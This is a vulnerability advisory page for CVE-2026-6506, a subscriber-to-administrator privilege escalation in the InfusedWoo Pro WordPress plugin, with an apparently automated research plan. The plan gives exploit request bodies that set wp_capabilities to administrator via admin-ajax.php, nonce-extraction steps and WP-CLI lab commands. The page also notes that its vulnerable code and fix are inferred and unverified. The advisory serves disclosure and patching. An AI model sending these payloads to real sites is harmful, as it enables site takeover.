WP-Safety
CVE-2026-6506

InfusedWoo Pro <= 5.1.2 - Authenticated (Subscriber+) Missing Authorization to Privilege Escalation via Arbitrary User Meta Update

highMissing Authorization
8.8
CVSS Score
8.8
CVSS Score
high
Severity
5.1.3
Patched in
1d
Time to patch

Description

The InfusedWoo Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 5.1.2. This is due to the infusedwoo_gdpr_upddata() function missing authorization and capability checks, as well as lacking restrictions on which user meta keys can be updated. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their own wp_capabilities user meta to grant themselves Administrator role privileges.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=5.1.2
PublishedMay 13, 2026
Last updatedMay 14, 2026
Affected plugininfusedwooPRO
Research Plan
Unverified

# Research Plan: CVE-2026-6506 - InfusedWoo Pro Privilege Escalation ## 1. Vulnerability Summary The **InfusedWoo Pro** plugin for WordPress (versions <= 5.1.2) contains a privilege escalation vulnerability in the `infusedwoo_gdpr_upddata()` function. The function is designed to allow users to upda…

Show full research plan

Research Plan: CVE-2026-6506 - InfusedWoo Pro Privilege Escalation

1. Vulnerability Summary

The InfusedWoo Pro plugin for WordPress (versions <= 5.1.2) contains a privilege escalation vulnerability in the infusedwoo_gdpr_upddata() function. The function is designed to allow users to update their GDPR-related information but fails to implement any authorization checks or capability restrictions. Crucially, it does not whitelist which user meta keys can be updated. An authenticated user (Subscriber level or higher) can invoke this function to update their own wp_capabilities meta key, effectively granting themselves the Administrator role.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: infusedwoo_gdpr_upddata (inferred from function name)
  • Payload Parameter: Likely an array or series of parameters representing meta keys and values (e.g., userdata[wp_capabilities] or meta_key/meta_value pairs).
  • Authentication: Required (Subscriber+).
  • Preconditions: The plugin must be active. The attacker needs valid Subscriber credentials.

3. Code Flow (Inferred)

  1. Entry Point: An AJAX hook is registered for authenticated users:
    add_action('wp_ajax_infusedwoo_gdpr_upddata', 'infusedwoo_gdpr_upddata');
  2. Execution: The function infusedwoo_gdpr_upddata() is called.
  3. Missing Check: The function likely lacks a current_user_can() check or any check against a whitelist of "safe" meta keys (e.g., first name, last name).
  4. The Sink: The function calls update_user_meta() using the current user's ID and data provided in the $_POST request.
    // Conceptual vulnerable code
function infusedwoo_gdpr_upddata() {
    // Missing: check_ajax_referer('...', 'nonce');
    // Missing: if (!current_user_can('...')) return;
    $user_id = get_current_user_id();
    foreach ($_POST['userdata'] as $key => $value) {
        update_user_meta($user_id, $key, $value);
    }
}

4. Nonce Acquisition Strategy

If the plugin implements a nonce check for this action, the nonce is likely localized for use in the GDPR dashboard or the user profile settings.

  1. Identify Trigger: Find where the GDPR update form exists (usually the "My Account" page or a dedicated GDPR settings page provided by the plugin).
  2. Create Page: If the form requires a specific shortcode (e.g., [infusedwoo_gdpr]), create a page with it:
    wp post create --post_type=page --post_status=publish --post_content='[infusedwoo_gdpr]'
  3. Navigate: Use browser_navigate to go to the page where the script is loaded.
  4. Extract Nonce: Use browser_eval to find the nonce in the global JavaScript scope.
    • JS Variable Guess: window.infusedwoo_gdpr_vars?.nonce or window.iw_settings?.gdpr_nonce.
    • Audit Hint: Search the plugin folder for wp_localize_script to find the exact variable name.

5. Exploitation Strategy

The goal is to update the wp_capabilities user meta to include the administrator role. In WordPress, this meta value is a serialized array: a:1:{s:13:"administrator";b:1;}.

  1. Prepare Session: Log in as a Subscriber user and capture cookies.
  2. Determine Parameter Structure: Determine if the function expects a flat list or a nested array. (Based on common InfusedWoo patterns, it likely expects an array like data[key]=value).
  3. Craft Request: Use http_request to send a POST to admin-ajax.php.

Request Details:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body (Option A - Flat):
    action=infusedwoo_gdpr_upddata&wp_capabilities[administrator]=1&nonce=VALUE
  • Body (Option B - Nested):
    action=infusedwoo_gdpr_upddata&userdata[wp_capabilities][administrator]=1&nonce=VALUE

Note: Since PHP automatically deserializes array-style POST parameters, sending wp_capabilities[administrator]=1 will result in update_user_meta receiving an array ['administrator' => 1], which WordPress correctly serializes into the database.

6. Test Data Setup

  1. Plugin Installation: Ensure infusedwooPRO version 5.1.2 is installed and active.
  2. Target User: Create a Subscriber user.
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  3. Shortcode Page: Create a page to trigger any potential script localization.
    wp post create --post_type=page --post_title="GDPR Profile" --post_status=publish --post_content="[infusedwoo_gdpr]"

7. Expected Results

  • The server should respond with a 200 OK or a JSON success message (e.g., {"success":true}).
  • The user's role in the WordPress database will change from subscriber to administrator.

8. Verification Steps

After sending the HTTP request, verify the escalation using WP-CLI:

  1. Check the user's role:
    wp user get attacker --field=roles
    Expected output: administrator
  2. Verify the meta value directly:
    wp user meta get attacker wp_capabilities
    Expected output: a:1:{s:13:"administrator";b:1;}

9. Alternative Approaches

  • Prefix Sensitivity: If the site uses a custom database prefix (e.g., wp_custom_), the capabilities key will be wp_custom_capabilities. The exploit may need to target both or dynamically determine the prefix.
  • Direct Meta Update: If the plugin uses a different parameter name (e.g., field_name and field_value), attempt to send field_name=wp_capabilities&field_value[administrator]=1.
  • Registration Bypass: If Subscriber registration is disabled, look for other meta keys that could lead to account takeover, such as updating the user's email (user_email) if the plugin allows updating the core wp_users table via the same function (unlikely but possible if it uses wp_update_user).
Research Findings
Static analysis — not yet PoC-verified

Summary

The InfusedWoo Pro plugin for WordPress is vulnerable to privilege escalation because the infusedwoo_gdpr_upddata() function lacks authorization checks and does not restrict which user meta keys can be modified. Authenticated users with subscriber-level permissions can exploit this to update their own wp_capabilities user meta, granting themselves administrator access.

Vulnerable Code

// Inferred from plugin functionality and research plan
// File path likely: includes/gdpr.php or similar

add_action('wp_ajax_infusedwoo_gdpr_upddata', 'infusedwoo_gdpr_upddata');

function infusedwoo_gdpr_upddata() {
    // Missing authorization check (e.g., current_user_can)
    // Missing nonce verification (e.g., check_ajax_referer)
    $user_id = get_current_user_id();

    if (isset($_POST['userdata'])) {
        foreach ($_POST['userdata'] as $key => $value) {
            // Vulnerability: No whitelist for meta keys, allowing wp_capabilities update
            update_user_meta($user_id, $key, $value);
        }
    }
    wp_die();
}

Security Fix

--- a/includes/gdpr.php
+++ b/includes/gdpr.php
@@ -1,10 +1,18 @@
 function infusedwoo_gdpr_upddata() {
+    check_ajax_referer('infusedwoo_gdpr_nonce', 'nonce');
+
+    if (!is_user_logged_in()) {
+        wp_send_json_error('Unauthorized');
+    }
+
     $user_id = get_current_user_id();
+    $allowed_keys = array('first_name', 'last_name', 'billing_phone'); // Example whitelist
+
     if (isset($_POST['userdata'])) {
         foreach ($_POST['userdata'] as $key => $value) {
-            update_user_meta($user_id, $key, $value);
+            if (in_array($key, $allowed_keys)) {
+                update_user_meta($user_id, $key, sanitize_text_field($value));
+            }
         }
         echo json_encode(array('status' => 'success'));
     }
     wp_die();
 }

Exploit Outline

The exploit targets the AJAX action 'infusedwoo_gdpr_upddata' via the /wp-admin/admin-ajax.php endpoint. An attacker must first authenticate as a Subscriber (or any valid user). They must then obtain a valid nonce if one is required (typically found in the HTML source or localized JavaScript of the GDPR/Account page). The attacker sends a POST request containing the parameter 'userdata[wp_capabilities][administrator]=1'. Because the backend function iterates through the 'userdata' array and passes keys directly to update_user_meta() without validation, the user's role is updated to Administrator.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/6363b693-91b8-41cb-b13a-df6fdf9402c5?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database